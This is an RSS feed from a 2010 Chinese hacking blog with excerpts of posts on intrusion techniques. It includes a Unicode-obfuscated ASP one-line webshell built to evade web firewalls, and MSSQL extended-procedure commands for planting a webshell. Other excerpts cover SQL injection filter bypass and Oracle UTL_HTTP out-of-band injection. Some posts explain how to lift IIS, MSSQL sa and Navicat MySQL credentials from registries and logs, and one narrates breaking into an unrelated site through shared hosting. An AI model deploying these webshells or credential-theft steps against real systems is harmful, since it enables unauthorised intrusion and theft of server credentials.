<?xml version="1.0" standalone="yes"?>
<?xml-stylesheet type="text/xsl" href="css/rss.xslt"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>黑面小窝 - 技术文章</title><link>http://www.heimian.com/</link><description>关注网络安全！关注黑客技术！关注seo优化！ - </description><generator>RainbowSoft Studio Z-Blog 1.8 Walle Build 100427</generator><language>zh-CN</language><copyright>Copyright Black face WebSite. Some Rights Reserved.</copyright><pubDate>Mon, 06 Sep 2010 01:35:03 +0800</pubDate><item><title>通过unicode躲开web防火墙过滤，webshell上传全是空格问题</title><author>3768110@qq.com (admin)</author><link>http://www.heimian.com/post/827.html</link><pubDate>Thu, 02 Sep 2010 13:56:02 +0800</pubDate><guid>http://www.heimian.com/post/827.html</guid><description><![CDATA[<div class="textcontent"><p>现在有不少服务器加了web的防火墙，用来过滤含asp/jsp/php的网马代码，全部用空格替换，</p><p>比较讨厌，不过后来刚好想到以前的一句话时候的unicode编码，那就也搞一个吧。</p><p>1.新建一个mdb</p><p>2.建表，考入：┼攠數畣整爠煥敵瑳&or;&equiv;┩&gt; nbsp;</p><p>（实际是&lt;% execute request(&ldquo;a&rdquo;)%&gt;）</p><p>3.改后缀为asp/asa</p>...</div>]]></description><category>技术文章</category><comments>http://www.heimian.com/post/827.html#comment</comments><wfw:comment>http://www.heimian.com/</wfw:comment><wfw:commentRss>http://www.heimian.com/feed.asp?cmt=827</wfw:commentRss><trackback:ping>http://www.heimian.com/cmd.asp?act=tb&amp;id=827&amp;key=494bf3d3</trackback:ping></item><item><title>sql注入——避开过滤</title><author>3768110@qq.com (admin)</author><link>http://www.heimian.com/post/823.html</link><pubDate>Mon, 30 Aug 2010 23:42:03 +0800</pubDate><guid>http://www.heimian.com/post/823.html</guid><description><![CDATA[<p>有的时候，很容易受到SQL注入攻击的程序，可能会进行输入过滤，用来防止攻击者无限制的利用其中存在的设计缺陷。</p><p>唱出会删除或者净化一些字符，或者阻止常用的sql关键词。</p><p>我们通常有以下几种技巧，去避开这些过滤。</p><p><strong><span style="font-size: small; color: #0000ff"><font size="2">1，避免使用被阻止的字符，即不使用这些字符仍然达到攻击目的。</font></span></strong></p>...]]></description><category>技术文章</category><comments>http://www.heimian.com/post/823.html#comment</comments><wfw:comment>http://www.heimian.com/</wfw:comment><wfw:commentRss>http://www.heimian.com/feed.asp?cmt=823</wfw:commentRss><trackback:ping>http://www.heimian.com/cmd.asp?act=tb&amp;id=823&amp;key=565888ba</trackback:ping></item><item><title>Adsutil.vbs脚本获取IIS配置信息及账号密码</title><author>3768110@qq.com (admin)</author><link>http://www.heimian.com/post/820.html</link><pubDate>Mon, 30 Aug 2010 04:20:22 +0800</pubDate><guid>http://www.heimian.com/post/820.html</guid><description><![CDATA[<p>作者：<a target="_blank" href="http://www.enjoyhack.com">enjoyhack</a></p><p>今晚在拿站的时候拿下旁站权限，但不能夸到目标站的目录下，眼看目标就在眼前却被最后一道关卡给卡死了。之前也有尝试过pr提权，单asp一执行pr就卡死了。。<br /><br />无奈之下找了群里龙儿心一起来研究，龙儿心经验不错，到shell上立马就搞定了目标站的路径，获取IIS网站路劲和其他基本信息也是使用一个VBS脚本搞定的，这个在我blog中有一个文章帖出来代码。这里我将就再帖下，并说明用法！<br />...</p>]]></description><category>技术文章</category><comments>http://www.heimian.com/post/820.html#comment</comments><wfw:comment>http://www.heimian.com/</wfw:comment><wfw:commentRss>http://www.heimian.com/feed.asp?cmt=820</wfw:commentRss><trackback:ping>http://www.heimian.com/cmd.asp?act=tb&amp;id=820&amp;key=93df72d4</trackback:ping></item><item><title>mssql2005注入</title><author>3768110@qq.com (admin)</author><link>http://www.heimian.com/post/806.html</link><pubDate>Sun, 22 Aug 2010 03:31:00 +0800</pubDate><guid>http://www.heimian.com/post/806.html</guid><description><![CDATA[<p>文/图 饭&nbsp;</p><p>Web应用程序一般都会使用数据库来保存各种信息，比如电子商务网站的帐户信息、销售商品的价格，订单、支付细节、和各种不同的权限数值等。数据库中的信息的读取、更新、增加或者删除等都是通过SQL来实现的，因此，在数据交互的环节没有安全过滤净化，则可能易于受到SQL注入攻击，严重的可能导致数据库非法操作，但是随着时间的推移，Web应用程序的开发者安全意识的日渐增强，SQL注入漏洞已经呈下降消失状态，但是之前的Web程序在被动防范SQL攻击时，还是略显乏力，或者说是考虑不太周全。比如说普遍使用的过滤关键字的方法，如果仅仅过滤单引号或者小写类的关键字，则极易出现绕过的情形，而国内的安全公司相继推出的硬件WAF是否会存在同样的问题呢？从根本上说硬件WAF基于访问请求流量来鉴别攻击行为，可能在以后的攻防对立的演化过程也会慢慢有爆出被绕过的问题，所有的问题依然存在。本文试着在注入的SQL语句中不引用单引号，来和大家讨论一下注入攻击的部分原理和技巧。在一次测试中，发现一注入点过滤了单引号和小写的关键字，提交语句如下：</p><p>...</p>]]></description><category>技术文章</category><comments>http://www.heimian.com/post/806.html#comment</comments><wfw:comment>http://www.heimian.com/</wfw:comment><wfw:commentRss>http://www.heimian.com/feed.asp?cmt=806</wfw:commentRss><trackback:ping>http://www.heimian.com/cmd.asp?act=tb&amp;id=806&amp;key=3219f404</trackback:ping></item><item><title>linux和windows系统直连Oracle数据库注入提权和修复详解</title><author>3768110@qq.com (admin)</author><link>http://www.heimian.com/post/805.html</link><pubDate>Sun, 22 Aug 2010 03:27:01 +0800</pubDate><guid>http://www.heimian.com/post/805.html</guid><description><![CDATA[<p>作者：菜牛<br />收到约镐通知，刚好正研究ORACLE 课题，而国内网上相关主题不是很多，所以就写了此<br />文，本文详细演示了针对linux 和windows 两种主流操作系统的ORACLE 提权过程，希望<br />对想了解ORACLE 但又不知道从何入手的朋友有帮助。对于管理员来说，也可以参考此文<br />看自己的数据库有否存在文中漏洞。<br />orACLE 数据库简介：<br />orACLE 是以高级结构化查询语言(SQL)为基础的大型关系数据库,它使用SQL(Structured<br />...</p>]]></description><category>技术文章</category><comments>http://www.heimian.com/post/805.html#comment</comments><wfw:comment>http://www.heimian.com/</wfw:comment><wfw:commentRss>http://www.heimian.com/feed.asp?cmt=805</wfw:commentRss><trackback:ping>http://www.heimian.com/cmd.asp?act=tb&amp;id=805&amp;key=79b932ef</trackback:ping></item><item><title>3个MSSQL扩展,可用来获取WEBSHELL</title><author>3768110@qq.com (admin)</author><link>http://www.heimian.com/post/804.html</link><pubDate>Fri, 20 Aug 2010 00:45:49 +0800</pubDate><guid>http://www.heimian.com/post/804.html</guid><description><![CDATA[<p><font size="2">EXEC [master].[dbo].[xp_makecab] 'c:\test.rar','default',1,'d:\cmd.asp'<br /><br />打包<br /><br />EXEC [master].[dbo].[xp_unpackcab] 'C:\test.rar','c:',1, 'n.asp'<br /><br />解包，可以用于得到webshell<br /><br />EXEC [master].[dbo].[xp_readerrorlog] 1,'d:\cmd.asp' <br />...</font></p>]]></description><category>技术文章</category><comments>http://www.heimian.com/post/804.html#comment</comments><wfw:comment>http://www.heimian.com/</wfw:comment><wfw:commentRss>http://www.heimian.com/feed.asp?cmt=804</wfw:commentRss><trackback:ping>http://www.heimian.com/cmd.asp?act=tb&amp;id=804&amp;key=5fc367b8</trackback:ping></item><item><title>Firfox插件之HackBar、TAMPER DATA</title><author>3768110@qq.com (admin)</author><link>http://www.heimian.com/post/773.html</link><pubDate>Sun, 01 Aug 2010 01:31:12 +0800</pubDate><guid>http://www.heimian.com/post/773.html</guid><description><![CDATA[<p>转自：黑客笔记</p><p>Firfox在其他方面我不知道，但是在入侵方面，真的威力很大的。</p><p>先介绍一个简单的组建 HACKBar。</p><p><span><img alt="" width="560" small="0" onload="javascript:contentimage(this);" onmousewheel="return cgimg(this);" src="http://www.heimian.com/upload/2010/8/201008010132370412.jpg" /><br />...</span></p>]]></description><category>技术文章</category><comments>http://www.heimian.com/post/773.html#comment</comments><wfw:comment>http://www.heimian.com/</wfw:comment><wfw:commentRss>http://www.heimian.com/feed.asp?cmt=773</wfw:commentRss><trackback:ping>http://www.heimian.com/cmd.asp?act=tb&amp;id=773&amp;key=e5af8e53</trackback:ping></item><item><title>手注oracle技术</title><author>3768110@qq.com (admin)</author><link>http://www.heimian.com/post/763.html</link><pubDate>Mon, 26 Jul 2010 17:48:49 +0800</pubDate><guid>http://www.heimian.com/post/763.html</guid><description><![CDATA[<p>作者：山东信息安全小组 Black.Eagle&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;  <br />声明：笔者在与该网站的站长及负责人联系后做的测试，征得对方同意后放出文章<br /><br />估计大家读了《oracle注入实战之渗透联通》一文之后都会为之一震，但是笔者不知道读者朋友有没有遇到过和笔者相似的情况，就是用union  select语句爆全部的表的时候，根本爆不出来，最多也就能爆出几个来，那该怎么继续呢？这里就用到了我们的UTL_HTTP反弹注射。<br />...</p>]]></description><category>技术文章</category><comments>http://www.heimian.com/post/763.html#comment</comments><wfw:comment>http://www.heimian.com/</wfw:comment><wfw:commentRss>http://www.heimian.com/feed.asp?cmt=763</wfw:commentRss><trackback:ping>http://www.heimian.com/cmd.asp?act=tb&amp;id=763&amp;key=120f8e58</trackback:ping></item><item><title>巧用MSSQL读取文件旁注入侵渗透某站</title><author>3768110@qq.com (admin)</author><link>http://www.heimian.com/post/761.html</link><pubDate>Mon, 26 Jul 2010 14:47:57 +0800</pubDate><guid>http://www.heimian.com/post/761.html</guid><description><![CDATA[<!--/post-title --><div class="copy fix">目标站点是老Y文章管理系统v2.5的。在网上找了下，目前基本上没有什么可直接利用的漏洞，于是开始旁注</div><p>上<a href="http://ip.468w.cn/"><u>http://ip.468w.cn/</u></a>  查了下。服务器上150个站，用super  injection导入全部站点后批量扫描注入点，很快拿到了服务器一个asp的shell,可是权限很低.几分钟过后又拿到同服另外的一个.net站的 shell，初步看了下，星外的虚拟主机，设置得比较安全，除了当前站点目录和c:\windows\temp可写入，找了许久都没找到一个即可写也可执 行的目录。这样信息获取的就比较少了，所幸在注册表里HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT \INSTALLFREEADMIN\11找到了星外虚拟主机配置信息 mssql sa密码 (32位md5加密,感谢sht同学帮我查询收费记录)<br />...</p>]]></description><category>技术文章</category><comments>http://www.heimian.com/post/761.html#comment</comments><wfw:comment>http://www.heimian.com/</wfw:comment><wfw:commentRss>http://www.heimian.com/feed.asp?cmt=761</wfw:commentRss><trackback:ping>http://www.heimian.com/cmd.asp?act=tb&amp;id=761&amp;key=e9666aac</trackback:ping></item><item><title>利用navicat提权</title><author>3768110@qq.com (admin)</author><link>http://www.heimian.com/post/760.html</link><pubDate>Mon, 26 Jul 2010 14:44:18 +0800</pubDate><guid>http://www.heimian.com/post/760.html</guid><description><![CDATA[<p><strong><span style="color: rgb(255, 0, 0);">navicat是一个比较流行的MySQL管理工具，在很多服务器上都可以找到</span></strong></p><p>有两个方法提权：</p><p>1、从日志文件里找密码，navicat会把操作日志（比如加账户）保存到My Documents\Navicat\MySQL\logs下的LogHistory.txt，低版本是安装目录下的logs下LogHistory.txt</p><p>2、navicat管理的MySQL服务器信息（一般是root帐户）是存在注册表里的，具体是HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers下，导出注册表导入到本机然后星号察看就OK了。。</p>...]]></description><category>技术文章</category><comments>http://www.heimian.com/post/760.html#comment</comments><wfw:comment>http://www.heimian.com/</wfw:comment><wfw:commentRss>http://www.heimian.com/feed.asp?cmt=760</wfw:commentRss><trackback:ping>http://www.heimian.com/cmd.asp?act=tb&amp;id=760&amp;key=70cd344d</trackback:ping></item></channel></rss>
